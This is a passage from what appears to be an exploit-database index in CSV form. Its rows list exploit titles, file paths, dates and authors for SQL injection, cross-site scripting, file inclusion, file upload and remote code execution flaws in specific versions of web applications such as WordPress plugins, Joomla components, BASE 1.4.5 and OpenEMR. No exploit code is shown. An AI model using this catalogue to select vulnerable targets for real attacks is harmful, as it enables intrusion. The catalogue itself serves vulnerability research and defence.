Scripting",2012-01-05,"Stefan Schurtz",php,webapps, -36510,exploits/php/webapps/36510.txt,"SQLiteManager 1.2.4 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2012-01-05,"Stefan Schurtz",php,webapps, -36512,exploits/php/webapps/36512.txt,"eFront 3.6.10 - 'download' Directory Traversal",2012-01-06,"Chokri B.A",php,webapps, -36515,exploits/asp/webapps/36515.txt,"DIGIT CMS 1.0.7 - Cross-Site Scripting / SQL Injection",2012-01-07,"BHG Security Center",asp,webapps, -36520,exploits/php/webapps/36520.txt,"Berta CMS - Arbitrary File Upload",2015-03-27,"Simon Waters",php,webapps,80 -36521,exploits/php/webapps/36521.txt,"Atar2b CMS 4.0.1 - 'gallery_e.php?id' SQL Injection",2012-01-07,"BHG Security Center",php,webapps, -36522,exploits/php/webapps/36522.txt,"Atar2b CMS 4.0.1 - 'pageH.php?id' SQL Injection",2012-01-07,"BHG Security Center",php,webapps, -36523,exploits/php/webapps/36523.txt,"Atar2b CMS 4.0.1 - 'pageE.php?id' SQL Injection",2012-01-07,"BHG Security Center",php,webapps, -36524,exploits/php/webapps/36524.txt,"Clipbucket 2.6 - 'channels.php?cat' Cross-Site Scripting",2012-01-09,YaDoY666,php,webapps, -36525,exploits/php/webapps/36525.txt,"Clipbucket 2.6 - 'collections.php?cat' Cross-Site Scripting",2012-01-09,YaDoY666,php,webapps, -36526,exploits/php/webapps/36526.txt,"Clipbucket 2.6 - 'groups.php?cat' Cross-Site Scripting",2012-01-09,YaDoY666,php,webapps, -36527,exploits/php/webapps/36527.txt,"Clipbucket 2.6 - 'search_result.php?query' Cross-Site Scripting",2012-01-09,YaDoY666,php,webapps, -36528,exploits/php/webapps/36528.txt,"Clipbucket 2.6 - 'videos.php?cat' Cross-Site Scripting",2012-01-09,YaDoY666,php,webapps, -36529,exploits/php/webapps/36529.txt,"Clipbucket 2.6 - 'view_collection.php?type' Cross-Site Scripting",2012-01-09,YaDoY666,php,webapps, -36530,exploits/php/webapps/36530.txt,"Clipbucket 2.6 - 'view_item.php?type' Cross-Site Scripting",2012-01-09,YaDoY666,php,webapps, -36531,exploits/php/webapps/36531.txt,"Clipbucket 2.6 - 'videos.php?time' SQL Injection",2012-01-09,YaDoY666,php,webapps, -36532,exploits/php/webapps/36532.txt,"Clipbucket 2.6 - 'channels.php?time' SQL Injection",2012-01-09,YaDoY666,php,webapps, -36534,exploits/php/webapps/36534.txt,"Marinet CMS - 'room2.php?roomid' SQL Injection",2012-01-09,"H4ckCity Security Team",php,webapps, -36535,exploits/php/webapps/36535.txt,"Marinet CMS - 'galleryphoto.php?id' SQL Injection",2012-01-09,"H4ckCity Security Team",php,webapps, -36536,exploits/php/webapps/36536.txt,"Marinet CMS - 'gallery.php?id' SQL Injection",2012-01-09,"H4ckCity Security Team",php,webapps, -36538,exploits/php/webapps/36538.txt,"Gregarius 0.6.1 - Multiple SQL Injections / Cross-Site Scripting",2012-01-09,sonyy,php,webapps, -36539,exploits/php/webapps/36539.txt,"Advanced File Management 1.4 - 'users.php' Cross-Site Scripting",2012-01-09,Am!r,php,webapps, -36540,exploits/php/webapps/36540.txt,"WordPress Plugin Age Verification 0.4 - 'redirect_to' Open Redirection",2012-01-10,"Gianluca Brindisi",php,webapps, -36541,exploits/php/webapps/36541.txt,"PHP-Fusion 7.2.4 - 'downloads.php' Cross-Site Scripting",2012-01-10,Am!r,php,webapps, -36543,exploits/php/webapps/36543.txt,"KnowledgeTree 3.x - Multiple Cross-Site Scripting Vulnerabilities",2012-01-11,"High-Tech Bridge SA",php,webapps, -36544,exploits/php/webapps/36544.txt,"Kayako SupportSuite 3.x - Multiple Vulnerabilities",2012-01-11,"Yuri Goltsev",php,webapps, -36547,exploits/asp/webapps/36547.txt,"MailEnable 6.02 - 'ForgottonPassword.aspx' Cross-Site Scripting",2012-01-12,"Sajjad Pourali",asp,webapps, -36548,exploits/java/webapps/36548.txt,"Contus Job Portal - 'Category' SQL Injection",2012-01-13,Lazmania61,java,webapps, -36549,exploits/php/webapps/36549.txt,"Joomla! Component com_contushdvideoshare 1.3 - 'id' SQL Injection",2012-01-12,Lazmania61,php,webapps, -36550,exploits/php/webapps/36550.txt,"PHP Membership Site Manager Script 2.1 - 'index.php' Cross-Site Scripting",2012-01-16,Atmon3r,php,webapps, -36551,exploits/php/webapps/36551.txt,"PHP Ringtone Website - 'ringtones.php' Multiple Cross-Site Scripting Vulnerabilities",2012-01-15,Atmon3r,php,webapps, -36552,exploits/php/webapps/36552.txt,"BoltWire 3.4.16 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps, -36553,exploits/java/webapps/36553.java,"JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution",2015-03-30,ikki,java,webapps, -36554,exploits/php/webapps/36554.txt,"WordPress Plugin Slider REvolution 4.1.4 - Arbitrary File Download",2015-03-30,"Claudio Viviani",php,webapps, -36559,exploits/php/webapps/36559.txt,"WordPress Plugin aspose-doc-exporter 1.0 - Arbitrary File Download",2015-03-30,ACC3SS,php,webapps, -36560,exploits/php/webapps/36560.txt,"Joomla! Component com_gallery_wd - SQL Injection",2015-03-30,CrashBandicot,php,webapps, -36561,exploits/php/webapps/36561.txt,"Joomla! Component Contact Form Maker 1.0.1 - SQL Injection",2015-03-30,"TUNISIAN CYBER",php,webapps, -36565,exploits/php/webapps/36565.txt,"ATutor 2.0.3 - Multiple Cross-Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps, -36566,exploits/php/webapps/36566.txt,"Beehive Forum 101 - Multiple Cross-Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps, -36567,exploits/php/webapps/36567.txt,"phpVideoPro 0.8.x/0.9.7 - Multiple Cross-Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps, -36568,exploits/php/webapps/36568.txt,"Giveaway Manager - 'members.php' Cross-Site Scripting",2012-01-16,Am!r,php,webapps, -36569,exploits/php/webapps/36569.txt,"Annuaire PHP - 'sites_inscription.php' Multiple Cross-Site Scripting Vulnerabilities",2012-01-16,Atmon3r,php,webapps, -36572,exploits/php/webapps/36572.txt,"Toner Cart - 'show_series_ink.php' SQL Injection",2012-01-18,Lazmania61,php,webapps, -36573,exploits/php/webapps/36573.txt,"MMORPG Zone - 'view_news.php' SQL Injection",2012-01-18,Lazmania61,php,webapps, -36574,exploits/php/webapps/36574.txt,"Freelance Zone - 'show_code.php' SQL Injection",2012-01-18,Lazmania61,php,webapps, -36575,exploits/multiple/webapps/36575.py,"JBoss AS 3/4/5/6 - Remote Command Execution",2015-03-31,"João Filho Matos Figueiredo",multiple,webapps, -36576,exploits/php/webapps/36576.txt,"WordPress Plugin SP Project & Document Manager 2.5.3 - Blind SQL Injection",2015-03-31,Catsecurity,php,webapps, -36580,exploits/windows/webapps/36580.rb,"Palo Alto Traps Server 3.1.2.1546 - Persistent Cross-Site Scripting",2015-03-31,"Michael Hendrickx",windows,webapps, -36581,exploits/php/webapps/36581.txt,"Fiyo CMS 2.0.1.8 - Multiple Vulnerabilities",2015-03-31,Mahendra,php,webapps,80 -36582,exploits/php/webapps/36582.txt,"OneOrZero AIMS - 'index.php' Cross-Site Scripting",2012-01-18,"High-Tech Bridge SA",php,webapps, -36583,exploits/php/webapps/36583.txt,"PostNuke pnAddressbook Module - 'id' SQL Injection",2012-01-19,"Robert Cooper",php,webapps, -36584,exploits/php/webapps/36584.txt,"Vastal EzineShop - 'view_mags.php' SQL Injection",2012-01-19,Lazmania61,php,webapps, -36585,exploits/asp/webapps/36585.txt,"Snitz Forums 2000 - 'TOPIC_ID' SQL Injection",2012-01-20,snup,asp,webapps, -36586,exploits/php/webapps/36586.txt,"Syneto Unified Threat Management 1.3.3/1.4.2 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-01-20,"Alexander Fuchs",php,webapps, -36588,exploits/asp/webapps/36588.txt,"Acidcat ASP CMS 3.5 - Multiple Cross-Site Scripting Vulnerabilities",2012-01-21,"Avram Marius",asp,webapps, -36589,exploits/php/webapps/36589.txt,"Joomla! Component com_br - 'Controller' Local File Inclusion",2012-01-23,the_cyber_nuxbie,php,webapps, -36590,exploits/php/webapps/36590.txt,"Tribiq CMS - 'index.php' SQL Injection",2012-01-21,"Skote Vahshat",php,webapps, -36591,exploits/php/webapps/36591.txt,"Joomla! Component Full - 'id' SQL Injection",2012-01-21,the_cyber_nuxbie,php,webapps, -36592,exploits/php/webapps/36592.txt,"Joomla! Component Vik Real Estate 1.0 - Multiple SQL Injections",2012-01-21,the_cyber_nuxbie,php,webapps, -36593,exploits/php/webapps/36593.txt,"Joomla! Component com_xball - 'team_id' SQL Injection",2012-01-23,CoBRa_21,php,webapps, -36594,exploits/php/webapps/36594.txt,"Joomla! Component com_boss - 'Controller' Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps, -36595,exploits/php/webapps/36595.txt,"Joomla! Component com_car - Multiple SQL Injections",2012-01-21,the_cyber_nuxbie,php,webapps, -36596,exploits/php/webapps/36596.txt,"Joomla! Component com_some - 'Controller' Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps, -36597,exploits/php/webapps/36597.txt,"Joomla! Component com_bulkenquery - 'Controller' Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps, -36598,exploits/php/webapps/36598.txt,"Joomla! Component com_kp - 'Controller' Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps, -36599,exploits/asp/webapps/36599.txt,"Raven 1.0 - 'connector.asp' Arbitrary File Upload",2012-01-21,HELLBOY,asp,webapps, -36600,exploits/php/webapps/36600.txt,"WordPress Plugin Business Intelligence - SQL Injection (Metasploit)",2015-04-02,"Jagriti Sahu",php,webapps,80 -36601,exploits/php/webapps/36601.txt,"Joomla! Component com_rand - SQL Injection",2015-04-02,"Jagriti Sahu",php,webapps,80 -36620,exploits/php/webapps/36620.txt,"WordPress Plugin YouSayToo auto-publishing 1.0 - 'submit' Cross-Site Scripting",2012-01-24,"H4ckCity Security Team",php,webapps, -36609,exploits/multiple/webapps/36609.txt,"Kemp Load Master 7.1.16 - Multiple Vulnerabilities",2015-04-02,"Roberto Suggi Liverani",multiple,webapps,80 -36610,exploits/php/webapps/36610.txt,"WordPress Plugin Video Gallery 2.8 - Multiple Cross-Site Request Forgery Vulnerabilities",2015-04-02,Divya,php,webapps,80 -36611,exploits/php/webapps/36611.txt,"Multiple WordPress UpThemes Themes - Arbitrary File Upload",2015-04-02,Divya,php,webapps,80 -36612,exploits/php/webapps/36612.txt,"WordPress Plugin WP Easy Slideshow 1.0.3 - Multiple Vulnerabilities",2015-04-02,Divya,php,webapps,80 -36613,exploits/php/webapps/36613.txt,"WordPress Plugin Simple Ads Manager - Multiple SQL Injections",2015-04-02,"ITAS Team",php,webapps,80 -36614,exploits/php/webapps/36614.txt,"WordPress Plugin Simple Ads Manager 2.5.94 - Arbitrary File Upload",2015-04-02,"ITAS Team",php,webapps,80 -36615,exploits/php/webapps/36615.txt,"WordPress Plugin Simple Ads Manager - Information Disclosure",2015-04-02,"ITAS Team",php,webapps,80 -36616,exploits/php/webapps/36616.txt,"phpSFP Schedule Facebook Posts 1.5.6 - SQL Injection",2015-04-02,@u0x,php,webapps,80 -36617,exploits/php/webapps/36617.txt,"WordPress Plugin VideoWhisper Video Presentation 3.31.17 - Arbitrary File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80 -36618,exploits/php/webapps/36618.txt,"WordPress Plugin VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80 -36619,exploits/linux/webapps/36619.txt,"Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal",2015-04-02,"Anastasios Monachos",linux,webapps, -36621,exploits/php/webapps/36621.txt,"glFusion 1.x - SQL Injection",2012-01-24,KedAns-Dz,php,webapps, -36623,exploits/php/webapps/36623.txt,"Ultimate Locator - 'radius' SQL Injection",2012-01-24,"Robert Cooper",php,webapps, -36624,exploits/php/webapps/36624.txt,"Joomla! Component JE Story Submit - 'index.php' Arbitrary File Upload",2012-01-24,"Robert Cooper",php,webapps, -36625,exploits/php/webapps/36625.txt,"OSClass 2.3.3 - 'index.php?sCategory' SQL Injection",2012-01-25,"High-Tech Bridge SA",php,webapps, -36626,exploits/php/webapps/36626.txt,"OSClass 2.3.3 - 'index.php?getParam()' Multiple Cross-Site Scripting Vulnerabilities",2012-01-25,"High-Tech Bridge SA",php,webapps, -36627,exploits/php/webapps/36627.txt,"DClassifieds 0.1 final - Cross-Site Request Forgery",2012-01-25,"High-Tech Bridge SA",php,webapps, -36628,exploits/php/webapps/36628.txt,"vBadvanced CMPS 3.2.2 - 'vba_cmps_include_bottom.php' Remote File Inclusion",2012-01-25,PacketiK,php,webapps, -36629,exploits/php/webapps/36629.txt,"Joomla! Component com_motor - 'cid' SQL Injection",2012-01-26,the_cyber_nuxbie,php,webapps, -36630,exploits/php/webapps/36630.txt,"Joomla! Component com_products - Multiple SQL Injections",2012-01-26,the_cyber_nuxbie,php,webapps, -36631,exploits/php/webapps/36631.txt,"WordPress Plugin Slideshow Gallery 1.1.x - 'border' Cross-Site Scripting",2012-01-26,"Bret Hawk",php,webapps, -36632,exploits/php/webapps/36632.txt,"xClick Cart 1.0.x - 'shopping_url' Cross-Site Scripting",2012-01-26,sonyy,php,webapps, -36634,exploits/php/webapps/36634.txt,"Joomla! Component com_visa - Local File Inclusion / SQL Injection",2012-01-28,the_cyber_nuxbie,php,webapps, -36635,exploits/php/webapps/36635.txt,"Joomla! Component com_firmy - 'Id' SQL Injection",2012-01-30,the_cyber_nuxbie,php,webapps, -36638,exploits/php/webapps/36638.txt,"Joomla! Component com_crhotels - 'catid' SQL Injection",2012-01-31,the_cyber_nuxbie,php,webapps, -36639,exploits/php/webapps/36639.txt,"Joomla! Component com_propertylab - 'id' SQL Injection",2012-01-30,the_cyber_nuxbie,php,webapps, -36640,exploits/php/webapps/36640.txt,"WordPress Plugin Work The Flow File Upload 2.5.2 - Arbitrary File Upload",2015-04-05,"Claudio Viviani",php,webapps, -36641,exploits/php/webapps/36641.txt,"u-Auctions - Multiple Vulnerabilities",2015-04-05,*Don*,php,webapps, -36642,exploits/php/webapps/36642.txt,"Joomla! Component com_bbs - Multiple SQL Injections",2012-01-30,the_cyber_nuxbie,php,webapps, -36643,exploits/php/webapps/36643.txt,"4Images 1.7.10 - '/admin/categories.php?cat_parent_id' SQL Injection",2012-01-31,RandomStorm,php,webapps, -36644,exploits/php/webapps/36644.txt,"4Images 1.7.10 - '/admin/categories.php?cat_parent_id' Cross-Site Scripting",2012-01-31,RandomStorm,php,webapps, -36645,exploits/php/webapps/36645.txt,"4Images 1.7.10 - '/admin/index.php?redirect' Arbitrary Site Redirect",2012-01-31,RandomStorm,php,webapps, -36646,exploits/php/webapps/36646.txt,"Joomla! Component com_cmotour - 'id' SQL Injection",2012-01-28,the_cyber_nuxbie,php,webapps, -36647,exploits/php/webapps/36647.txt,"Lead Capture - 'login.php' Script Cross-Site Scripting",2012-01-21,HashoR,php,webapps, -36648,exploits/php/webapps/36648.txt,"OpenEMR 4.1 - '/Interface/patient_file/encounter/trend_form.php?formname' Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps, -36649,exploits/php/webapps/36649.txt,"OpenEMR 4.1 - '/Interface/patient_file/encounter/load_form.php?formname' Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps, -36650,exploits/php/webapps/36650.txt,"OpenEMR 4.1 - '/contrib/acog/print_form.php?formname' Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps, -36651,exploits/php/webapps/36651.txt,"OpenEMR 4.1 - '/Interface/fax/fax_dispatch.php?File' 'exec()' Call Arbitrary Shell Command Execution",2012-02-01,"High-Tech Bridge SA",php,webapps, -36654,exploits/php/webapps/36654.txt,"phpLDAPadmin 1.2.2 - 'base' Cross-Site Scripting",2012-02-01,andsarmiento,php,webapps, -36655,exploits/php/webapps/36655.txt,"phpLDAPadmin 1.2.0.5-2 - 'server_id' Cross-Site Scripting",2012-02-01,andsarmiento,php,webapps, -36656,exploits/php/webapps/36656.txt,"GForge 5.7.1 - Multiple Cross-Site Scripting Vulnerabilities",2012-02-02,sonyy,php,webapps, -36657,exploits/php/webapps/36657.txt,"Joomla! Component com_bnf - 'seccion_id' SQL Injection",2012-02-02,"Daniel Godoy",php,webapps, -36658,exploits/php/webapps/36658.txt,"iknSupport 'search' Module - Cross-Site Scripting",2012-02-02,"Red Security TEAM",php,webapps, -36659,exploits/php/webapps/36659.txt,"Joomla! Component Currency Converter 1.0.0 - 'from' Cross-Site Scripting",2012-02-02,"BHG Security Center",php,webapps, -36660,exploits/php/webapps/36660.txt,"project-open 3.4.x - 'account-closed.tcl' Cross-Site Scripting",2012-02-03,"Michail Poultsakis",php,webapps, -36661,exploits/php/webapps/36661.txt,"PHP-Fusion 7.2.4 - 'weblink_id' SQL Injection",2012-02-03,Am!r,php,webapps, -36664,exploits/php/webapps/36664.txt,"Vespa 0.8.6 - 'getid3.php' Local File Inclusion",2012-02-06,T0x!c,php,webapps, -36665,exploits/php/webapps/36665.txt,"Simple Groupware 0.742 - 'export' Cross-Site Scripting",2012-02-07,"Infoserve Security Team",php,webapps, -36666,exploits/java/webapps/36666.txt,"ManageEngine ADManager Plus 5.2 Build 5210 - 'Operation' Cross-Site Scripting",2012-02-07,LiquidWorm,java,webapps, -36667,exploits/java/webapps/36667.txt,"ManageEngine ADManager Plus 5.2 Build 5210 - 'domainName' Cross-Site Scripting",2012-02-07,LiquidWorm,java,webapps, -36668,exploits/php/webapps/36668.txt,"eFront 3.6.10 - 'administrator.php' Cross-Site Scripting",2012-02-07,"Chokri B.A",php,webapps, -36671,exploits/php/webapps/36671.txt,"WordPress Plugin All In One WP Security & Firewall 3.9.0 - SQL Injection",2015-04-08,"Claudio Viviani",php,webapps,80 -36674,exploits/php/webapps/36674.txt,"WordPress Plugin Shareaholic 7.6.0.3 - Cross-Site Scripting",2015-04-08,"Kacper Szurek",php,webapps,80 -36675,exploits/php/webapps/36675.txt,"Balero CMS 0.7.2 - Multiple Blind SQL Injections",2015-04-08,LiquidWorm,php,webapps,80 -36676,exploits/php/webapps/36676.html,"Balero CMS 0.7.2 - Multiple JS/HTML Injection Vulnerabilities",2015-04-08,LiquidWorm,php,webapps,80 -36677,exploits/php/webapps/36677.txt,"WordPress Plugin Traffic Analyzer 3.4.2 - Blind SQL Injection",2015-04-08,"Dan King",php,webapps,80 -36678,exploits/jsp/webapps/36678.txt,"ZENworks Configuration Management 11.3.1 - Remote Code Execution",2015-04-08,"Pedro Ribeiro",jsp,webapps, -36683,exploits/php/webapps/36683.txt,"Dolibarr CMS 3.x - '/adherents/fiche.php' SQL Injection",2012-02-10,"Benjamin Kunz Mejri",php,webapps, -36684,exploits/java/webapps/36684.txt,"LxCenter Kloxo 6.1.10 - Multiple HTML Injection Vulnerabilities",2012-02-10,anonymous,java,webapps, -36685,exploits/php/webapps/36685.txt,"CubeCart 3.0.20 - Multiple Script 'redir' Arbitrary Site Redirects",2012-02-10,"Aung Khant",php,webapps, -36686,exploits/php/webapps/36686.txt,"CubeCart 3.0.20 - '/admin/login.php?goto' Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps, -36687,exploits/php/webapps/36687.txt,"CubeCart 3.0.20 - 'switch.php?r' Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps, -36688,exploits/php/webapps/36688.html,"Zen Cart 1.3.9h - '/path_to_admin/product.php' Cross-Site Request Forgery",2012-02-10,DisK0nn3cT,php,webapps, -36689,exploits/linux/webapps/36689.txt,"BOA Web Server 0.94.8.2 - Arbitrary File Access",2000-12-19,llmora,linux,webapps, -36691,exploits/php/webapps/36691.txt,"WordPress Plugin Windows Desktop and iPhone Photo Uploader - Arbitrary File Upload",2015-04-09,"Manish Tanwar",php,webapps,80 -36693,exploits/php/webapps/36693.txt,"RabbitWiki - 'title' Cross-Site Scripting",2012-02-10,sonyy,php,webapps, -36694,exploits/php/webapps/36694.txt,"eFront Community++ 3.6.10 - SQL Injection / Multiple HTML Injection Vulnerabilities",2012-02-12,"Benjamin Kunz Mejri",php,webapps, -36695,exploits/php/webapps/36695.txt,"Zimbra - 'view' Cross-Site Scripting",2012-02-13,sonyy,php,webapps, -36696,exploits/php/webapps/36696.txt,"Nova CMS - '/administrator/modules/moduleslist.php?id' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36697,exploits/php/webapps/36697.txt,"Nova CMS - '/optimizer/index.php?fileType' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36698,exploits/php/webapps/36698.txt,"Nova CMS - '/includes/function/gets.php?Filename' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36699,exploits/php/webapps/36699.txt,"Nova CMS - '/includes/function/usertpl.php?conf[blockfile]' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36702,exploits/php/webapps/36702.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_db_setup.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36703,exploits/php/webapps/36703.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_graph_common.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36704,exploits/php/webapps/36704.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_graph_display.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36705,exploits/php/webapps/36705.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_graph_form.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36706,exploits/php/webapps/36706.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_graph_main.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36707,exploits/php/webapps/36707.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_local_rules.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36708,exploits/php/webapps/36708.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_logout.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36709,exploits/php/webapps/36709.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_main.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36710,exploits/php/webapps/36710.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_maintenance.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36711,exploits/php/webapps/36711.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_payload.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36712,exploits/php/webapps/36712.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/help/base_setup_help.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36713,exploits/php/webapps/36713.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_action.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36714,exploits/php/webapps/36714.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_cache.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36715,exploits/php/webapps/36715.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_db.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36716,exploits/php/webapps/36716.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_include.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36717,exploits/php/webapps/36717.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_output_html.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36718,exploits/php/webapps/36718.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_output_query.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36719,exploits/php/webapps/36719.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_state_criteria.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36720,exploits/php/webapps/36720.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_state_query.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36721,exploits/php/webapps/36721.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/setup/base_conf_contents.php' Multiple Remote File Inclusions",2012-02-11,indoushka,php,webapps, -36722,exploits/php/webapps/36722.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_state_common.inc.php?GLOBALS[user_session_path]' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36723,exploits/php/webapps/36723.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/setup/setup2.php?ado_inc_PHP' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36724,exploits/php/webapps/36724.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_ag_main.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36725,exploits/php/webapps/36725.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_qry_alert.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36726,exploits/php/webapps/36726.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_qry_common.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36727,exploits/php/webapps/36727.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_alerts.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36728,exploits/php/webapps/36728.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_class.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36729,exploits/php/webapps/36729.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_common.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36730,exploits/php/webapps/36730.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_ipaddr.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36731,exploits/php/webapps/36731.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_iplink.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36732,exploits/php/webapps/36732.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_ports.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36733,exploits/php/webapps/36733.txt,"WordPress Plugin WP Mobile Edition 2.7 - Remote File Disclosure",2015-04-13,"Khwanchai Kaewyos",php,webapps, -36735,exploits/php/webapps/36735.txt,"WordPress Plugin Duplicator 0.5.14 - SQL Injection / Cross-Site Request Forgery",2015-04-13,"Claudio Viviani",php,webapps, -36736,exploits/php/webapps/36736.txt,"Traidnt Up 3.0 - SQL Injection",2015-04-13,"Ali Trixx",php,webapps, -36738,exploits/php/webapps/36738.txt,"WordPress Plugin N-Media Website Contact Form with File Upload 1.3.4 - Arbitrary File Upload (1)",2015-04-13,"Claudio Viviani",php,webapps, -36761,exploits/php/webapps/36761.txt,"WordPress Plugin MiwoFTP 1.0.5 - Cross-Site Request Forgery / Arbitrary File Deletion",2015-04-14,LiquidWorm,php,webapps,80 -36752,exploits/php/webapps/36752.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_sensor.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36753,exploits/php/webapps/36753.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_time.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36754,exploits/php/webapps/36754.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_uaddr.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36751,exploits/php/webapps/36751.txt,"WordPress Plugin Video Gallery 2.8 - SQL Injection",2015-04-14,"Claudio Viviani",php,webapps,80 -36755,exploits/php/webapps/36755.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_user.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36757,exploits/php/webapps/36757.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'index.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36758,exploits/php/webapps/36758.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/admin/base_useradmin.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36759,exploits/php/webapps/36759.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/admin/index.php?base_path' Remote File Inclusion",2012-02-11,indoushka,php,webapps, -36760,exploits/php/webapps/36760.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_ag_main.php' Crafted Arbitrary File Upload / Arbitrary Code Execution",2012-02-11,indoushka,php,webapps, -36762,exploits/php/webapps/36762.txt,"WordPress Plugin MiwoFTP 1.0.5 - Multiple Cross-Site Request Forgery / Cross-Site Scripting Vulnerabilities",2015-04-14,LiquidWorm,php,webapps,80 -36763,exploits/php/webapps/36763.txt,"WordPress Plugin MiwoFTP 1.0.5 - Cross-Site Request Forgery / Arbitrary File Creation / Remote Code Execution",2015-04-14,LiquidWorm,php,webapps,80 -36764,exploits/php/webapps/36764.txt,"SMW+ 1.5.6 - 'target' HTML Injection",2012-02-13,sonyy,php,webapps, -36765,exploits/php/webapps/36765.txt,"Powie pFile 1.02 - 